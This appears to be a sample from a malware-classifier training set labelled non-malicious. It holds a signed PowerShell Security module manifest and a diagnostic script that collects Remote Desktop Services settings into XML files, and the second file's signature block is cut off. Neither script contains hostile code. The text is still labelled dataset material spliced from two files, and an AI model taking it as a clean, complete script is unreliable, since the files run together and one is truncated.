@{ GUID="A94C8C7E-9810-47C0-B8AF-65089C13A35A" Author="PowerShell" CompanyName="Microsoft Corporation" Copyright="Copyright (c) Microsoft Corporation." ModuleVersion="7.0.0.0" CompatiblePSEditions = @("Core") PowerShellVersion="3.0" FunctionsToExport = @() CmdletsToExport="Get-Credential", "Get-ExecutionPolicy", "Set-ExecutionPolicy", "ConvertFrom-SecureString", "ConvertTo-SecureString", "Get-PfxCertificate" , "Protect-CmsMessage", "Unprotect-CmsMessage", "Get-CmsMessage" AliasesToExport = @() NestedModules="Microsoft.PowerShell.Security.dll" HelpInfoURI = 'https://aka.ms/powershell72-help' } # SIG # Begin signature block # MIIoKgYJKoZIhvcNAQcCoIIoGzCCKBcCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAMiHmazz1gQ06K # unvXv+rGMEHONdPsUaRwD11+c7rHFaCCDXYwggX0MIID3KADAgECAhMzAAAEBGx0 # Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz # NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo # DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3 # a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF # HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy # 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC # Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj # L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp # h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3 # cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X # dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL # E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi # u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1 # sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq # 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb # DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/ # V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIBNd88v60ME/cMf1rqdBP4T3 # 9yMm5kc3mIDQApOzrnFZMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEASIcmXCBALoNe/avgvwl2HpthBc/SiY8m/rzqXEwEKwAzl54H99ciSlHc # +uwBQSFy9SbgdkckDCehiupMXdREIZemJkQ2pACuJGAlU37QYrEbxFYkl/a+OCR0 # w+zy3LwLziDvB+C7MbA2TwMW1e2YwezpUK3GlZbAgiASaXMhrNsc3OHnY67poo5j # 6eR3/j1PewX7gvoOxEqYJ1UZr7OUCuxkUNYYD0GbXuzusSvAEQ0/fQ7b9tBqygbb # 5zQSDL8hMo1fvHgXwesVgHUKo8RYUbl/oGAP63rjmnXrx+gyjxOkqjI7lkMuFBVg # gxWyVOItt744aIaR1aZQ+TvyPhT6eKGCF5QwgheQBgorBgEEAYI3AwMBMYIXgDCC # F3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq # hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCBnNvz1I03TtFMida7uuSAHili1HQ3ZndrM6c6/HpjUFgIGZwgPwXMg # GBMyMDI0MTAxNjE4MzM1MS42ODdaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046RTAwMi0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg # ghHqMIIHIDCCBQigAwIBAgITMwAAAe4F0wIwspqdpwABAAAB7jANBgkqhkiG9w0B # AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1 # NDRaFw0yNTAzMDUxODQ1NDRaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z # MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046RTAwMi0wNUUwLUQ5NDcxJTAjBgNV # BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQC+8byl16KEia8xKS4vVL7REOOR7LzYCLXEtWgeqyOV # lrzuEz+AoCa4tBGESjbHTXECeMOwP9TPeKaKalfTU5XSGjpJhpGx59fxMJoTYWPz # zD0O2RAlyBmOBBmiLDXRDQJL1RtuAjvCiLulVQeiPI8V7+HhTR391TbC1beSxwXf # dKJqY1onjDawqDJAmtwsA/gmqXgHwF9fZWcwKSuXiZBTbU5fcm3bhhlRNw5d04Ld # 15ZWzVl/VDp/iRerGo2Is/0Wwn/a3eGOdHrvfwIbfk6lVqwbNQE11Oedn2uvRjKW # EwerXL70OuDZ8vLzxry0yEdvQ8ky+Vfq8mfEXS907Y7rN/HYX6cCsC2soyXG3OwC # tLA7o0/+kKJZuOrD5HUrSz3kfqgDlmWy67z8ZZPjkiDC1dYW1jN77t5iSl5Wp1HK # Bp7JU8RiRI+vY2i1cb5X2REkw3WrNW/jbofXEs9t4bgd+yU8sgKn9MtVnQ65s6QG # 72M/yaUZG2HMI31tm9mooH29vPBO9jDMOIu0LwzUTkIWflgd/vEWfTNcPWEQj7fs # WuSoVuJ3uBqwNmRSpmQDzSfMaIzuys0pvV1jFWqtqwwCcaY/WXsb/axkxB/zCTdH # SBUJ8Tm3i4PM9skiunXY+cSqH58jWkpHbbLA3Ofss7e+JbMjKmTdcjmSkb5oN8qU # 1wIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFBCIzT8a2dwgnr37xd+2v1/cdqYIMB8G # A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG # Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy # MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w # XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy # dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG # A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD # AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQB3ZyAva2EKOWSVpBnYkzX8f8GZjaOs577F # 9o14Anh9lKy6tS34wXoPXEyQp1v1iI7rJzZVG7rpUznay2n9csfn3p6y7kYkHqtS # ugCGmTiiBkwhFfSByKPI08MklgvJvKTZb673yGfpFwPjQwZeI6EPj/OAtpYkT7IU # XqMki1CRMJKgeY4wURCccIujdWRkoVv4J3q/87KE0qPQmAR9fqMNxjI3ZClVxA4w # iM3tNVlRbF9SgpOnjVo3P/I5p8Jd41hNSVCx/8j3qM7aLSKtDzOEUNs+ZtjhznmZ # gUd7/AWHDhwBHdL57TI9h7niZkfOZOXncYsKxG4gryTshU6G6sAYpbqdME/+/g1u # er7VGIHUtLq3W0Anm8lAfS9PqthskZt54JF28CHdsFq/7XVBtFlxL/KgcQylJNni # a+anixUG60yUDt3FMGSJI34xG9NHsz3BpqSWueGtJhQ5ZN0K8ju0vNVgF+Dv05si # rPg0ftSKf9FVECp93o8ogF48jh8CT/B32lz1D6Truk4Ezcw7E1OhtOMf7DHgPMWf # 6WOdYnf+HaSJx7ZTXCJsW5oOkM0sLitxBpSpGcj2YjnNznCpsEPZat0h+6d7ulRa # WR5RHAUyFFQ9jRa7KWaNGdELTs+nHSlYjYeQpK5QSXjigdKlLQPBlX+9zOoGAJho # Zfrpjq4nQDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI # hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy # MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC # AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg # M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF # dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6 # GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp # Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu # yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E # XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0 # lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q # GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ # +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA # PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw # EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG # NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV # MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj # cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK # BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC # AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX # zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v # cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI # KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG # 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x # M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC # VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449 # xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM # nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS # PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d # Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn # GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs # QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL # jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL # 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNN # MIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn # MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkUwMDItMDVFMC1EOTQ3MSUwIwYDVQQD # ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCI # o6bVNvflFxbUWCDQ3YYKy6O+k6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6rp2vDAiGA8yMDI0MTAxNjE3MzAz # NloYDzIwMjQxMDE3MTczMDM2WjB0MDoGCisGAQQBhFkKBAExLDAqMAoCBQDquna8 # AgEAMAcCAQACAicWMAcCAQACAhMGMAoCBQDqu8g8AgEAMDYGCisGAQQBhFkKBAIx # KDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZI # hvcNAQELBQADggEBAAVODDMIZ6W2LPrkcEVt4Fzx/uEMxixhKMk+TzR4DmevZU9P # qJmx+ZYxe5PxCHixXZz+MMehuI7GtC70yIzMD12oSxDBG7KJdCOFcJYGAuTXJxSP # Un7kqbPd4d6UFV8+W+jCmtv+vsUsv9XMVmGwllGAYnb0S9nM5vWLpSaBX5Avtx0H # KUz0dtY5Ll6HLhHcWm9B/KdrQZ/Fq5qGmCTbNC3Z2/Y1oqiwes2O9GYmv1tA5Mh3 # K4Oe6JBDefJ/al+vhwvpe5O5NMZpEQnK7QTG2th6QAcIhLddE0F+SvwhNuU5h82A # u4x5reHvL1x605CMOLv25rTmOe1fPYn7YHPQbF8xggQNMIIECQIBATCBkzB8MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNy # b3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAe4F0wIwspqdpwABAAAB7jAN # BglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8G # CSqGSIb3DQEJBDEiBCCdoCRYEPp2fukg5NU8eZe+aIqJZsAGM7iLu1RZw3ktdTCB # +gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIE9QdxSVhfq+Vdf+DPs+5EIkBz9o # CS/OQflHkVRhfjAhMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh # c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD # b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw # MTACEzMAAAHuBdMCMLKanacAAQAAAe4wIgQgypNBqG7fU7A7VCn6X/tdhEQ2o++X # iJP/DubAOv0bKlowDQYJKoZIhvcNAQELBQAEggIAC2cfokrNap01jfg16dACmrgJ # +YR0/0NxlMndAQE3o0ZN4p60dRgy0ya52UYXBNL44oggBocaL+dXpCJCve5pbFOb # 4jlaZJObfXX5WWGavKZNT2Ph9j7Wk8YEClsdgVYo6M9nhpRS2FOlaqAn+uecgIrH # IUIUnPBitDm1lyAG/hI5oPOlvJDx6yiUBCWojnxUMTgP6iiDdXFuRwQt54pAp0lI # 3NxW22bS/ghe9gHPLg6uiQAgXzs0JtS1z8WRD7Uj7WxZcC6z/g9wOXrflz1en0cO # XRn4gSwF1NgF4SvzuQl+klk0Bc1TT3qZJRsO4Z767Rb8p0JuVdcFOkj6wqJSS2nf # zge88MnvFVvs0YVGmenp8TzBRLFycwK1gEWoEkjqVZVsnYqNITj2nadvKq7Hizs8 # rLU4V4B3a3hJKBDbJKrDnlewt2SduUW3Brep//glC6Jp3exqruVynLgg71OgQqmk # t1ZgCXUl/PVtDUP7v5CLhMAYWXypht3ohd1krB+MFUF70ZQtVgo1xevLrDplx8i3 # ag/7pEOjf7v/terHpuYAkztjFWQorW2rV9LQIXGUiGX93+P5dJTzc7BvYCdWuUum # er6F2QxhGAsnF3agi15K2dvLJMBuGVByQ1d8DZm1oz5D45zDxYhyTt/TO611L6ji # Q0rEbJRw9qT6QrSYxcg= # SIG # End signature block
combined_dataset/train/non-malicious/sample_3_9.ps1
sample_3_9.ps1
#************************************************ # DC_RDSPowerInfo.ps1 # Version 1.0.1 # Date: 21-01-2012 # Author: Daniel Grund - dgrund@microsoft.com # Description: # This script gets the RDP config and # checks vital signs to inform user. # 1.0.0 Beta release #************************************************ PARAM( $TargetHost, $OutputFileName, $RDSSDPStrings ) # globals and function definitions for RDS Import-LocalizedData -BindingVariable RDSSDPStrings # Everything in Try catch because import-module might fail try{ import-module RemoteDesktopServices $RDS = get-childitem RDS: $RDS | foreach-object{ Write-DiagProgress -Activity $RDSSDPStrings.ID_RDSServerProgress -Status ($RDSSDPStrings.ID_RDSPowerShell +" ("+ $_ + ")") $Job = Start-Job -initializationScript {import-module RemoteDesktopServices} -scriptblock {try{get-childitem -recurse rds:\$_ }catch{ $Error.Clear() }} #wait for max 3 minutes to complete Wait-Job $Job -Timeout (3*60) Stop-Job $Job if ($job.HasMoreData -eq $true) { $config = Receive-Job $Job |select-object PSPath,Name,CurrentValue,PermissibleValues,Description,GroupPolicy $xml = ConvertTo-Xml $config $savepath = $TargetHost + "_" + $_.Name + "_Settings.xml" [array]$OutputFileName += $savepath $xml.Save($savepath) } Remove-Job $Job } } catch { $RCNum +=1 ReportError -RCNum $RCNum -RootCause $RDSSDPStrings.ID_RDSPowerShellError -Solution $RDSSDPStrings.ID_RDSPowerShellSolution } $Error.Clear() # SIG # Begin signature block # MIIoOQYJKoZIhvcNAQcCoIIoKjCCKCYCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDgIXTIC9IVsn0m # Q8knckGTmbjn6eYN19caJ3hav61IwqCCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # 